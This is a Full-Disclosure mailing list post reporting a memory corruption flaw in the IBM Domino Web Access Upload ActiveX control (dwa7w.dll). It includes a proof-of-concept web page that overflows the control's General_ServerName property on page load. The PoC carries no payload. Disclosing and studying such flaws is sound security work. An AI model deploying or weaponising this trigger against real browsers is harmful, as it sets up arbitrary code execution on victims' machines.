[Full-disclosure] IBM Domino Web Access Upload Control dwa7w.dll Memory Corruption



The Domino Web Access Upload Module version 7.0.34.1 seems to suffer from a memory corruption issue that may allow the execution of arbitrary code. By setting the General_ServerName property and calling the InstallBrowserHelperDll() function it MAY be possible to control the ECX register and thereby control the EIP. PoC as follows:

-------------------
<!--
written by e.b.
-->
<html>
<head>
<script language="JavaScript" DEFER>
function Check() {
var s = 'A';

while (s.length <= 12000) s = s + 'A';

obj.General_ServerName = s;
obj.InstallBrowserHelperDll();

}
</script>

</head>
<body onload="JavaScript: return Check();">
<object id="obj" classid="clsid:E008A543-CEFB-4559-912F-C27C2B89F13B" />
</object>
</body>
</html>
-------------------


Elazar

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/